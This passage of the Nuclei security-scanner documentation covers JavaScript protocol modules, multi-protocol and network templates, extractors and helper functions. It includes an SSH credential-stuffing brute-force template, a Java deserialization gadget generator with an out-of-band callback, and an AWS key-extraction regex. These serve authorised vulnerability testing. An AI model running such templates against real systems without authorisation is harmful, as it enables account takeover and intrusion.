The items of msg slice must match the values required by the format exactly.
Ex: structs.pack("H", 0)
#### Parameters
| Name | Type |
| :---------- | :------- |
| `formatStr` | `string` |
| `msg` | `any` |
#### Returns
`Uint8Array` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const packed = structs.Pack('H', [0]);
```
#### Defined in
structs.ts:13
***
### StructsCalcSize
▸ **StructsCalcSize**(`format`): `number` | `null`
StructsCalcSize returns the number of bytes needed to pack the values according to the given format.
Ex: structs.CalcSize("H")
#### Parameters
| Name | Type |
| :------- | :------- |
| `format` | `string` |
#### Returns
`number` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const size = structs.CalcSize('H');
```
#### Defined in
structs.ts:28
***
### Unpack
▸ **Unpack**(`format`, `msg`): `any` | `null`
StructsUnpack the byte slice (presumably packed by Pack(format, msg)) according to the given format.
The result is a \[]interface{} slice even if it contains exactly one item.
The byte slice must contain at least the amount of data required by the format
(len(msg) must be greater than or equal to CalcSize(format)).
Ex: structs.Unpack(">I", buff\[:nb])
#### Parameters
| Name | Type |
| :------- | :----------- |
| `format` | `string` |
| `msg` | `Uint8Array` |
#### Returns
`any` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const result = structs.Unpack('H', [0]);
```
#### Defined in
structs.ts:46
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/telnet
# Namespace: telnet
## Table of contents
### Interfaces
* [IsTelnetResponse](/templates/protocols/javascript/modules/telnet.IsTelnetResponse)
### Functions
* [IsTelnet](/templates/protocols/javascript/modules/telnet#istelnet)
## Functions
### IsTelnet
▸ **IsTelnet**(`host`, `port`): [`IsTelnetResponse`](/templates/protocols/javascript/modules/telnet.IsTelnetResponse) | `null`
IsTelnet checks if a host is running a Telnet server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsTelnetResponse`](/templates/protocols/javascript/modules/telnet.IsTelnetResponse) | `null`
**`Example`**
```javascript
const telnet = require('nuclei/telnet');
const isTelnet = telnet.IsTelnet('acme.com', 23);
log(toJSON(isTelnet));
```
#### Defined in
telnet.ts:12
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/vnc
# Namespace: vnc
## Table of contents
### Interfaces
* [IsVNCResponse](/templates/protocols/javascript/modules/vnc.IsVNCResponse)
### Functions
* [IsVNC](/templates/protocols/javascript/modules/vnc#isvnc)
## Functions
### IsVNC
▸ **IsVNC**(`host`, `port`): [`IsVNCResponse`](/templates/protocols/javascript/modules/vnc.IsVNCResponse) | `null`
IsVNC checks if a host is running a VNC server.
It returns a boolean indicating if the host is running a VNC server
and the banner of the VNC server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsVNCResponse`](/templates/protocols/javascript/modules/vnc.IsVNCResponse) | `null`
**`Example`**
```javascript
const vnc = require('nuclei/vnc');
const isVNC = vnc.IsVNC('acme.com', 5900);
log(toJSON(isVNC));
```
#### Defined in
vnc.ts:14
# JavaScript Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/protocol
Review examples of JavaScript with Nuclei v3
The JavaScript protocol was added to Nuclei v3 to allow you to write checks and detections for exploits in JavaScript and to bridge the gap between network protocols.
* Internally any content written using the JavaScript protocol is executed in Golang.
* The JavaScript protocol is **not** intended to fit into or be imported with any existing JavaScript libraries or frameworks outside of the Nuclei ecosystem.
* Nuclei provides a set of functions and libraries that are tailor-made for writing exploits and checks, and only adds the required/necessary functionality to complement the existing YAML-based DSL.
* The JavaScript protocol is **not** intended to be used as a general purpose JavaScript runtime and does not replace matchers, extractors, or any existing functionality of Nuclei.
* Nuclei v3.0.0 ships with **15+ libraries (ssh, ftp, RDP, Kerberos, and Redis)** tailored for writing exploits and checks in JavaScript; this set will be continuously expanded in the future.
## Simple Example
Here is a basic example of a JavaScript protocol template:
```yaml
id: ssh-server-fingerprint

info:
  name: Fingerprint SSH Server Software
  author: Ice3man543,tarunKoyalwar
  severity: info

javascript:
  - code: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      to_json(response);

    args:
      Host: "{{Host}}"
      Port: "22"

    extractors:
      - type: json
        json:
          - '.ServerID.Raw'
```
In the Nuclei template example above, we are fingerprinting SSH server software by connecting in non-auth mode and extracting the server banner. Let's break down the template.
### Code Section
The `code:` section contains the actual JavaScript code that is executed by Nuclei at runtime. In the above template, we are:
* Importing `nuclei/ssh` module/library
* Creating a new instance of `SSHClient` object
* Connecting to SSH server in `Info` mode
* Converting response to json
### Args Section
The `args:` section can be understood as variables that are passed to the JavaScript code at runtime; their values support DSL usage.
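For instance, a minimal sketch of an `args:` block using a DSL helper as a value (the argument names and the helper used here are illustrative, not from the template above):
```yaml
args:
  Host: "{{Host}}"
  Port: "22"
  # the value below is a DSL expression evaluated at runtime (illustrative)
  Nonce: "{{rand_text_alpha(8)}}"
```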
### Output Section
The value of the last expression is returned as the output of JavaScript protocol template and can be used in matchers and extractors. If the server returns an error instead, then the `error` variable is exposed in the matcher or extractor with an error message.
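As an illustration (a minimal sketch, assuming the JavaScript protocol exposes the returned value under the `response` part), a matcher could key off that output:
```yaml
matchers:
  - type: word
    part: response   # value produced by the last JavaScript expression (assumed part name)
    words:
      - "SSH-2.0"
```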
## SSH Bruteforce Example
**SSH Password Bruteforce Template**
```yaml
id: ssh-brute

info:
  name: SSH Credential Stuffing
  author: tarunKoyalwar
  severity: critical

javascript:
  - pre-condition: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      var response = c.ConnectSSHInfoMode(Host, Port);
      // only bruteforce if ssh server allows password based authentication
      response["UserAuth"].includes("password")

    code: |
      var m = require("nuclei/ssh");
      var c = m.SSHClient();
      c.Connect(Host,Port,Username,Password);

    args:
      Host: "{{Host}}"
      Port: "22"
      Username: "{{usernames}}"
      Password: "{{passwords}}"

    threads: 10
    attack: clusterbomb
    payloads:
      usernames: helpers/wordlists/wp-users.txt
      passwords: helpers/wordlists/wp-passwords.txt
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "response == true"
          - "success == true"
        condition: and
```
In the example template above, we are bruteforcing the ssh server with a list of usernames and passwords; this would have been difficult to achieve with the network template. Let's break down the template.
### Pre-Condition
`pre-condition` is an optional section of JavaScript code that is executed before running “code” and acts as a pre-condition to exploit. In the above template, before attempting brute force, we check if:
* The address is actually an SSH server.
* The ssh server is configured to allow password-based authentication.
**Further explanation**
* `code` is executed only if the pre-condition returns `true`; otherwise, it is skipped.
* In the code section, we import `nuclei/ssh` module and create a new instance of `SSHClient` object.
* Then we attempt to connect to the ssh server with a username and password.
This template uses [payloads](https://docs.projectdiscovery.io/templates/protocols/http/http-payloads) to launch a clusterbomb attack with 10 threads and exits on the first match.
Looking at this template now, we can tell that JavaScript templates are powerful for writing multistep and protocol/vendor-specific exploits, which is a primary goal of the JavaScript protocol.
## Init
`init` is an optional JavaScript section that can be used to initialize the template, and it is executed just after compiling the template and before running it on any target. Although it is rarely needed, it can be used to load and preprocess data before running a template on any target.
For example, in the code block below, we are loading all ssh private keys from the `nuclei-templates/helpers` directory and storing them as a variable in payloads with the name `keys`. If we were loading private keys from the "pre-condition" code block, then they would have been loaded for every target, which is not ideal.
```
variables:
  keysDir: "helpers/" # load all private keys from this directory

javascript:
  # the init field can be used to make any preparations before the actual exploit
  # here we are reading all private keys from the helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)

    payloads:
      # 'keys' will be updated with the actual private keys after init is executed
      keys:
        - key1
        - key2
```
Two special functions that are available in the `init` block are
| Function | Description |
| -------------------------- | ---------------------------------------- |
| `updatePayload(key,value)` | updates payload with given key and value |
| `set(key,value)` | sets a variable with given key and value |
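A minimal sketch of the `set` helper (the key and value here are purely illustrative):
```yaml
javascript:
  - init: |
      // sets a variable with the given key and value (per the table above); names are illustrative
      set('api_version', 'v2')
```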
A collection of JavaScript protocol templates can be found [here](https://github.com/projectdiscovery/nuclei-templates/pull/8530).
# Multi-protocol
Source: https://docs.projectdiscovery.io/templates/protocols/multi-protocol
Learn about multi-protocol support in Nuclei v3
Nuclei provides support for a variety of protocols including HTTP, DNS, Network, SSL, and Code. This allows users to write Nuclei templates for vulnerabilities across these protocols. However, there may be instances where a vulnerability requires the synchronous execution of multiple protocols for testing or exploitation. A prime example of this is **subdomain takeovers**, which necessitates a check for the CNAME record of a subdomain, followed by verification of a string in the HTTP response. While this was partially achievable with workflows in Nuclei, the introduction of **Nuclei v3.0** has made it possible to conveniently write a **template** that can execute multiple protocols synchronously. This allows for checks to be performed on the results of each protocol, along with other enhancements.
**Example:**
```yaml
id: dns-http-template

info:
  name: dns + http takeover template
  author: pdteam
  severity: info

dns:
  - name: "{{FQDN}}" # dns request
    type: cname

http:
  - method: GET # http request
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - contains(http_body,'Domain not found') # check for string from http response
          - contains(dns_cname, 'github.io') # check for cname from dns response
        condition: and
```
The example above demonstrates that there is no need for new logic or syntax. Simply write the logic for each protocol and then use the protocol-prefixed variable or the [dynamic extractor](https://docs.projectdiscovery.io/templates/reference/extractors#dynamic-extractor) to export that variable. This variable is then shared across all protocols. We refer to this as the **Template Context**, which contains all variables that are scoped at the template level.
## Features
The following features enhance the power of multi-protocol execution:
* Protocol-Scoped Shared Variables Across Protocols
* Data Export across Protocols using Dynamic Extractor
### Protocol Scoped Variables
In the previous example, we demonstrated how to export the DNS CNAME and use it in an HTTP request. However, you might encounter a scenario where a template includes more than four protocols, and you need to export various response fields such as `subject_dn`, `ns`, `cname`, `header`, and so on. While you could achieve this by adding more dynamic extractors, this approach could clutter the template and introduce redundant logic, making it difficult to track and maintain all the variables.
To address this issue, multi-protocol execution supports template-scoped protocol responses. This means that all response fields from all protocols in a template are available in the template context with a protocol prefix.
Here's an example to illustrate this:
| Protocol | Response Field | Exported Variable |
| -------- | -------------- | ----------------- |
| ssl | subject\_cn | ssl\_subject\_cn |
| dns | cname | dns\_cname |
| http | header | http\_header |
| code | response | code\_response |
This is just an example, but it's important to note that the response fields of all protocols used in a multi-protocol template are exported.
**Example:**
```yaml
id: dns-ssl-http-proto-prefix

info:
  name: multi protocol request with response fields
  author: pdteam
  severity: info

dns:
  - name: "{{FQDN}}" # DNS Request
    type: cname

ssl:
  - address: "{{Hostname}}" # ssl request

http:
  - method: GET # http request
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - contains(http_body,'ProjectDiscovery.io') # check for http string
          - trim_suffix(dns_cname,'.ghost.io.') == 'projectdiscovery' # check for cname (extracted information from dns response)
          - ssl_subject_cn == 'blog.projectdiscovery.io'
        condition: and
```
To list all exported response fields, write a multi-protocol template and run it with the `-v -svd` flags; it will print all exported response fields.
Example:
```bash
nuclei -t multi-protocol-template.yaml -u scanme.sh -debug -svd
```
### Data Export across Protocols
If you are unfamiliar with dynamic extractors, we recommend reading the [dynamic extractor](https://docs.projectdiscovery.io/templates/reference/extractors#dynamic-extractor) section first.
Previously, Dynamic Extractors were only supported for specific protocols or workflows. However, with multi-protocol execution, dynamically extracted values are stored in the template context and can be used across all protocols.
**Example:**
```yaml
id: dns-http-template

info:
  name: dns + http takeover template
  author: pdteam
  severity: info

dns:
  - name: "{{FQDN}}" # dns request
    type: cname

    extractors:
      - type: dsl
        name: exported_cname
        dsl:
          - cname
        internal: true

http:
  - method: GET # http request
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - contains(body,'Domain not found') # check for http string
          - contains(exported_cname, 'github.io') # check for cname (extracted information from dns response)
        condition: and
```
## How Multi-Protocol Execution Works
At this point, we have seen what multi-protocol templates look like and the features they bring to the table. Now let's look at how multi-protocol templates work and what to keep in mind while writing them.
* Multi-protocol templates are executed in the order the protocols are defined in the template.
* Protocols in multi-protocol templates are executed serially, i.e. one after another.
* Response fields of each protocol are exported to the template context as soon as that protocol is executed.
* Variables are scoped at the template level and evaluated after each protocol execution.
* Multi-protocol execution brings limited indirect support for preprocessing (using variables) and postprocessing (using dynamic extractors) across protocols.
## FAQ
**What Protocols are supported in Multi-Protocol Execution Mode?**
> There is no restriction: any protocol available/implemented in the Nuclei engine can be used in multi-protocol templates.
**How many protocols can be used in Multi-Protocol Execution Mode?**
> There is no restriction on the number of protocols, but currently duplicated protocols are not supported, i.e. dns -> http -> ssl -> http. Please open an issue if you have a vulnerability/use case that requires duplicated protocols.
**What happens if a protocol fails?**
> Multi-protocol execution follows an exit-on-error policy, i.e. if a protocol fails to execute, the remaining protocols are skipped and template execution is stopped.
**How is multi protocol execution different from workflows?**
> A workflow, as the name suggests, executes templates based on a workflow file.
>
> * A workflow does not contain the actual logic of a vulnerability; it only orchestrates the execution of different templates
> * A workflow supports conditional execution of multiple templates
> * A workflow has limited support for variables and dynamic extractors
To summarize, a workflow sits a step above templates and manages the execution of templates based on a workflow file.
**Is multi protocol execution supported in nuclei v2?**
> No, multi-protocol execution is only supported in Nuclei v3 and above.
# Network Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/network
Learn about network requests with Nuclei
Nuclei can act as an automatable **Netcat**, allowing users to send bytes across the wire and receive them, while providing matching and extracting capabilities on the response.
Network Requests start with a **network** block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
tcp:
```
### Inputs
The first thing in the request is **inputs**. Inputs are the data that will be sent to the server, and optionally any data to read from the server.
At its most simple, just specify a string, and it will be sent across the network socket.
```yaml
# inputs is the list of inputs to send to the server
inputs:
  - data: "TEST\r\n"
```
You can also send hex-encoded text, which will first be decoded, and the raw bytes will be sent to the server.
```yaml
inputs:
  - data: "50494e47"
    type: hex
  - data: "\r\n"
```
Helper function expressions can also be defined in the input; they will first be evaluated and then sent to the server. The previous hex-encoded example can be sent with helper functions this way:
```yaml
inputs:
  - data: 'hex_decode("50494e47")\r\n'
```
One last thing that can be done with inputs is reading data from the socket. Specifying `read-size` with a non-zero value will do the trick. You can also assign the read data some name, so matching can be done on that part.
```yaml
inputs:
  - read-size: 8
```
Example with reading a number of bytes, and only matching on them.
```yaml
inputs:
- read-size: 8
name: prefix
...
matchers:
- type: word
part: prefix
words:
- "CAFEBABE"
```
Multiple steps can be chained together in sequence to do network reading / writing.
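For example, a hedged sketch of chaining a read and a write in sequence (the sizes, names, and data are illustrative):
```yaml
inputs:
  - read-size: 4          # read the server banner prefix first
    name: banner
  - data: "STATUS\r\n"    # then send a follow-up command
  - read-size: 64
    name: status
```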
### Host
The next part of the request is the **host** to connect to. Dynamic variables can be placed in the host to modify its value at runtime. Variables start with `{{` and end with `}}` and are case-sensitive.
1. **Hostname** - variable is replaced by the hostname provided on command line.
An example host value:
```yaml
host:
  - "{{Hostname}}"
```
Nuclei can also make a TLS connection to the target server. Just add the `tls://` prefix before the **Hostname** and you're good to go.
```yaml
host:
  - "tls://{{Hostname}}"
```
If a port is specified in the host, the user supplied port is ignored and the template port takes precedence.
### Port
Starting from Nuclei v2.9.15, a new field called `port` has been introduced in network templates. This field allows users to specify the port separately instead of including it in the host field.
Previously, if you wanted to write a network template for an exploit targeting SSH, you would have to specify both the hostname and the port in the host field, like this:
```yaml
host:
  - "{{Hostname}}"
  - "{{Host}}:22"
```
In the above example, two network requests are sent: one to the port specified in the input/target, and another to the default SSH port (22).
The reason behind introducing the port field is to provide users with more flexibility when running network templates on both default and non-default ports. For example, if a user knows that the SSH service is running on a non-default port of 2222 (after performing a port scan with service discovery), they can simply run:
```bash
$ nuclei -u scanme.sh:2222 -id xyz-ssh-exploit
```
In this case, Nuclei will use port 2222 instead of the default port 22. If the user doesn't specify any port in the input, port 22 will be used by default. However, this approach may not be straightforward to understand and can generate warnings in logs since one request is expected to fail.
Another issue with the previous design of writing network templates is that requests can be sent to unexpected ports. For example, if a web service is running on port 8443 and the user runs:
```bash
$ nuclei -u scanme.sh:8443
```
In this case, `xyz-ssh-exploit` template will send one request to `scanme.sh:22` and another request to `scanme.sh:8443`, which may return unexpected responses and eventually result in errors. This is particularly problematic in automation scenarios.
To address these issues while maintaining the existing functionality, network templates can now be written in the following way:
```yaml
host:
  - "{{Hostname}}"
port: 22
```
In this new design, the functionality to run templates on non-standard ports will still exist, except for the default reserved ports (`80`, `443`, `8080`, `8443`, `8081`, `53`). Additionally, the list of default reserved ports can be customized by adding a new field called exclude-ports:
```yaml
exclude-ports: 80,443
```
When `exclude-ports` is used, the default reserved ports list will be overwritten. This means that if you want to run a network template on port `80`, you will have to explicitly specify it in the port field.
Starting from Nuclei v3.1.0, the `port` field supports comma-separated values, so multiple ports can be specified. For example, if you want to run a network template on ports `5432` and `5433`, you can specify them in the port field like this:
```yaml
port: 5432,5433
```
In this case, Nuclei will first check which of the listed ports are open and run the template only against the open ports.
#### Matchers / Extractor Parts
Valid `part` values supported by the **Network** protocol for matchers / extractors are:
| Value | Description |
| ---------------- | ----------------------------------- |
| request | Network Request |
| data | Final Data Read From Network Socket |
| raw / body / all | All Data received from Socket |
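For instance, a minimal sketch of matching only on the final data read from the socket (the word is illustrative):
```yaml
matchers:
  - type: word
    part: data            # final data read from the network socket
    words:
      - "ismaster"        # illustrative value
```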
### **Example Network Template**
The final example template file, using a `hex`-encoded input to detect MongoDB running on servers, with working matchers, is provided below.
```yaml
id: input-expressions-mongodb-detect

info:
  name: Input Expression MongoDB Detection
  author: pdteam
  severity: info
  reference: https://github.com/orleven/Tentacle

tcp:
  - inputs:
      - data: "{{hex_decode('3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000')}}"
    host:
      - "{{Hostname}}"
    port: 27017
    read-size: 2048
    matchers:
      - type: word
        words:
          - "logicalSessionTimeout"
          - "localTime"
```
More complete examples are provided [here](/templates/protocols/network-examples).
# Extractors
Source: https://docs.projectdiscovery.io/templates/reference/extractors
Review details on extractors for Nuclei
Extractors can be used to extract a match from the response returned by a module and display it in the results.
### Types
Multiple extractors can be specified in a request. As of now, we support five types of extractors.
1. **regex** - Extract data from response based on a Regular Expression.
2. **kval** - Extract `key: value`/`key=value` formatted data from Response Header/Cookie
3. **json** - Extract data from JSON based response in JQ like syntax.
4. **xpath** - Extract xpath based data from HTML Response
5. **dsl** - Extract data from the response based on a DSL expressions.
### Regex Extractor
Example extractor for HTTP Response body using **regex** -
```yaml
extractors:
  - type: regex # type of the extractor
    part: body # part of the response (header,body,all)
    regex:
      - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" # regex to use for extraction.
```
### Kval Extractor
A **kval** extractor example to extract `content-type` header from HTTP Response.
```yaml
extractors:
  - type: kval # type of the extractor
    kval:
      - content_type # header/cookie value to extract from response
```
Note that `content-type` has been replaced with `content_type` because **kval** extractor does not accept dash (`-`) as input and must be substituted with underscore (`_`).
### JSON Extractor
A **json** extractor example to extract value of `id` object from JSON block.
```yaml
- type: json # type of the extractor
  part: body
  name: user
  json:
    - '.[] | .id' # JQ like syntax for extraction
```
For more details about JQ - [https://github.com/stedolan/jq](https://github.com/stedolan/jq)
### Xpath Extractor
A **xpath** extractor example to extract value of `href` attribute from HTML response.
```yaml
extractors:
  - type: xpath # type of the extractor
    attribute: href # attribute value to extract (optional)
    xpath:
      - '/html/body/div/p[2]/a' # xpath value for extraction
```
With a simple [copy paste in browser](https://www.scientecheasy.com/2020/07/find-xpath-chrome.html/), we can get the **xpath** value from any web page content.
### DSL Extractor
A **dsl** extractor example to extract the effective `body` length through the `len` helper function from HTTP Response.
```yaml
extractors:
  - type: dsl # type of the extractor
    dsl:
      - len(body) # dsl expression value to extract from response
```
### Dynamic Extractor
Extractors can be used to capture Dynamic Values on runtime while writing Multi-Request templates. CSRF Tokens, Session Headers, etc. can be extracted and used in requests. This feature is only available in RAW request format.
Example of defining a dynamic extractor with name `api` which will capture a regex based pattern from the request.
```yaml
extractors:
  - type: regex
    name: api
    part: body
    internal: true # Required for using dynamic variables
    regex:
      - "(?m)[0-9]{3,10}\\.[0-9]+"
```
The extracted value is stored in the variable **api**, which can be utilised in any section of the subsequent requests.
If you want to use an extractor as a dynamic variable, you must use `internal: true` to avoid printing extracted values in the terminal.
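For instance, a sketch of consuming the extracted `api` value in a later raw request of the same template (the endpoint path is illustrative):
```yaml
- raw:
    - |
      GET /api/{{api}}/details HTTP/1.1
      Host: {{Hostname}}
```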
An optional regex **match-group** can also be specified for the regex for more complex matches.
```yaml
extractors:
  - type: regex # type of extractor
    name: csrf_token # defining the variable name
    part: body # part of response to look for
    # group defines the matching group being used.
    # In GO the "match" is the full array of all matches and submatches
    # match[0] is the full match
    # match[n] is the submatches. Most often we'd want match[1] as depicted below
    group: 1
    regex:
      - '<input\sname="csrf_token"\stype="hidden"\svalue="([[:alnum:]]{16})"\s/>'
```
The above extractor with name `csrf_token` will hold the value extracted by `([[:alnum:]]{16})` as `abcdefgh12345678`.
If no group option is provided with this regex, the above extractor with name `csrf_token` will hold the full match (by `<input\sname="csrf_token"\stype="hidden"\svalue="([[:alnum:]]{16})"\s/>`) as `<input name="csrf_token" type="hidden" value="abcdefgh12345678" />`.
### Reusable Dynamic Extractors
With Nuclei v3.1.4, you can reuse a dynamically extracted value (e.g. `csrf_token` in the above example) immediately in subsequent extractors, and it is available by default in subsequent requests.
Example:
```
id: basic-raw-example

info:
  name: Test RAW Template
  author: pdteam
  severity: info

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: title
        group: 1
        regex:
          - '<title>(.*)<\/title>'
        internal: true

      - type: dsl
        dsl:
          - '"Title is " + title'
```
# Helper Functions
Source: https://docs.projectdiscovery.io/templates/reference/helper-functions
Review details on helper functions for Nuclei
Here is the list of all supported helper functions that can be used in RAW requests / Network requests.
| Helper function | Description | Example | Output |
| ---------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| aes\_gcm(key, plaintext interface{}) \[]byte | AES GCM encrypts a string with key | `{{hex_encode(aes_gcm("AES256Key-32Characters1234567890", "exampleplaintext"))}}` | `ec183a153b8e8ae7925beed74728534b57a60920c0b009eaa7608a34e06325804c096d7eebccddea3e5ed6c4` |
| base64(src interface{}) string | Base64 encodes a string | `base64("Hello")` | `SGVsbG8=` |
| base64\_decode(src interface{}) \[]byte | Base64 decodes a string | `base64_decode("SGVsbG8=")` | `Hello` |
| base64\_py(src interface{}) string | Encodes string to base64 like python (with new lines) | `base64_py("Hello")` | `SGVsbG8=\n` |
| bin\_to\_dec(binaryNumber number \| string) float64 | Transforms the input binary number into a decimal format | `bin_to_dec("0b1010")` `bin_to_dec(1010)` | `10` |
| compare\_versions(versionToCheck string, constraints ...string) bool | Compares the first version argument with the provided constraints | `compare_versions('v1.0.0', '\>v0.0.1', '\<v1.0.1')` | `true` |
| date\_time(dateTimeFormat string, optionalUnixTime interface{}) string | Returns the formatted date time using a simplified or Go-style layout for the current or the given unix time | `date_time("%Y-%M-%D %H:%m", 1654870680)` `date_time("2006-01-02 15:04", unix_time())` | `2022-06-10 14:18` |
| dec\_to\_hex(number number \| string) string | Transforms the input number into hexadecimal format | `dec_to_hex(7001)` | `1b59` |
| ends\_with(str string, suffix ...string) bool | Checks if the string ends with any of the provided substrings | `ends_with("Hello", "lo")` | `true` |
| generate\_java\_gadget(gadget, cmd, encoding interface{}) string | Generates a Java Deserialization Gadget | `generate_java_gadget("dns", "{{interactsh-url}}", "base64")` | `rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHQAAHEAfgAFdAAFcHh0ACpjYWhnMmZiaW41NjRvMGJ0MHRzMDhycDdlZXBwYjkxNDUub2FzdC5mdW54` |
| generate\_jwt(json, algorithm, signature, unixMaxAge) \[]byte | Generates a JSON Web Token (JWT) using the claims provided in a JSON string, the signature, and the specified algorithm | `generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")` | `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U` |
| gzip(input string) string | Compresses the input using GZip | `base64(gzip("Hello"))` | `+H4sIAAAAAAAA//JIzcnJBwQAAP//gonR9wUAAAA=` |
| gzip\_decode(input string) string | Decompresses the input using GZip | `gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))` | `Hello` |
| hex\_decode(input interface{}) \[]byte | Hex decodes the given input | `hex_decode("6161")` | `aa` |
| hex\_encode(input interface{}) string | Hex encodes the given input | `hex_encode("aa")` | `6161` |
| hex\_to\_dec(hexNumber number \| string) float64 | Transforms the input hexadecimal number into decimal format | `hex_to_dec("ff")` `hex_to_dec("0xff")` | `255` |
| hmac(algorithm, data, secret) string | hmac function that accepts a hashing function type with data and secret | `hmac("sha1", "test", "scrt")` | `8856b111056d946d5c6c92a21b43c233596623c6` |
| html\_escape(input interface{}) string | HTML escapes the given input | `html_escape("<body>test</body>")` | `&lt;body&gt;test&lt;/body&gt;` |
| html\_unescape(input interface{}) string | HTML un-escapes the given input | `html_unescape("&lt;body&gt;test&lt;/body&gt;")` | `<body>test</body>` |
| join(separator string, elements ...interface{}) string | Joins the given elements using the specified separator | `join("_", 123, "hello", "world")` | `123_hello_world` |
| json\_minify(json) string | Minifies a JSON string by removing unnecessary whitespace | `json_minify("{ \"name\": \"John Doe\", \"foo\": \"bar\" }")` | `{"foo":"bar","name":"John Doe"}` |
| json\_prettify(json) string | Prettifies a JSON string by adding indentation | `json_prettify("{\"foo\":\"bar\",\"name\":\"John Doe\"}")` | `{\n \"foo\": \"bar\",\n \"name\": \"John Doe\"\n}` |
| len(arg interface{}) int | Returns the length of the input | `len("Hello")` | `5` |
| line\_ends\_with(str string, suffix ...string) bool | Checks if any line of the string ends with any of the provided substrings | `line_ends_with("Hello\nHi", "lo")` | `true` |
| line\_starts\_with(str string, prefix ...string) bool | Checks if any line of the string starts with any of the provided substrings | `line_starts_with("Hi\nHello", "He")` | `true` |
| md5(input interface{}) string | Calculates the MD5 (Message Digest) hash of the input | `md5("Hello")` | `8b1a9953c4611296a827abf8c47804d7` |
| mmh3(input interface{}) string | Calculates the MMH3 (MurmurHash3) hash of an input | `mmh3("Hello")` | `316307400` |
| oct\_to\_dec(octalNumber number \| string) float64 | Transforms the input octal number into a decimal format | `oct_to_dec("0o1234567")` `oct_to_dec(1234567)` | `342391` |
| print\_debug(args ...interface{}) | Prints the value of a given input or expression. Used for debugging. | `print_debug(1+2, "Hello")` | `3 Hello` |
| rand\_base(length uint, optionalCharSet string) string | Generates a random sequence of given length string from an optional charset (defaults to letters and numbers) | `rand_base(5, "abc")` | `caccb` |
| rand\_char(optionalCharSet string) string | Generates a random character from an optional character set (defaults to letters and numbers) | `rand_char("abc")` | `a` |
| rand\_int(optionalMin, optionalMax uint) int | Generates a random integer between the given optional limits (defaults to 0 - MaxInt32) | `rand_int(1, 10)` | `6` |
| rand\_text\_alpha(length uint, optionalBadChars string) string | Generates a random string of letters, of given length, excluding the optional cutset characters | `rand_text_alpha(10, "abc")` | `WKozhjJWlJ` |
| rand\_text\_alphanumeric(length uint, optionalBadChars string) string | Generates a random alphanumeric string, of given length without the optional cutset characters | `rand_text_alphanumeric(10, "ab12")` | `NthI0IiY8r` |
| rand\_ip(cidr ...string) string | Generates a random IP address | `rand_ip("192.168.0.0/24")` | `192.168.0.171` |
| rand\_text\_numeric(length uint, optionalBadNumbers string) string | Generates a random numeric string of given length without the optional set of undesired numbers | `rand_text_numeric(10, 123)` | `0654087985` |
| regex(pattern, input string) bool | Tests the given regular expression against the input string | `regex("H([a-z]+)o", "Hello")` | `true` |
| remove\_bad\_chars(input, cutset interface{}) string | Removes the desired characters from the input | `remove_bad_chars("abcd", "bc")` | `ad` |
| repeat(str string, count uint) string | Repeats the input string the given amount of times | `repeat("../", 5)` | `../../../../../` |
| replace(str, old, new string) string | Replaces a given substring in the given input | `replace("Hello", "He", "Ha")` | `Hallo` |
| replace\_regex(source, regex, replacement string) string | Replaces substrings matching the given regular expression in the input | `replace_regex("He123llo", "(\\d+)", "")` | `Hello` |
| reverse(input string) string | Reverses the given input | `reverse("abc")` | `cba` |
| sha1(input interface{}) string | Calculates the SHA1 (Secure Hash 1) hash of the input | `sha1("Hello")` | `f7ff9e8b7bb2e09b70935a5d785e0cc5d9d0abf0` |
| sha256(input interface{}) string | Calculates the SHA256 (Secure Hash 256) hash of the input | `sha256("Hello")` | `185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969` |
| starts\_with(str string, prefix ...string) bool | Checks if the string starts with any of the provided substrings | `starts_with("Hello", "He")` | `true` |
| to\_lower(input string) string | Transforms the input into lowercase characters | `to_lower("HELLO")` | `hello` |
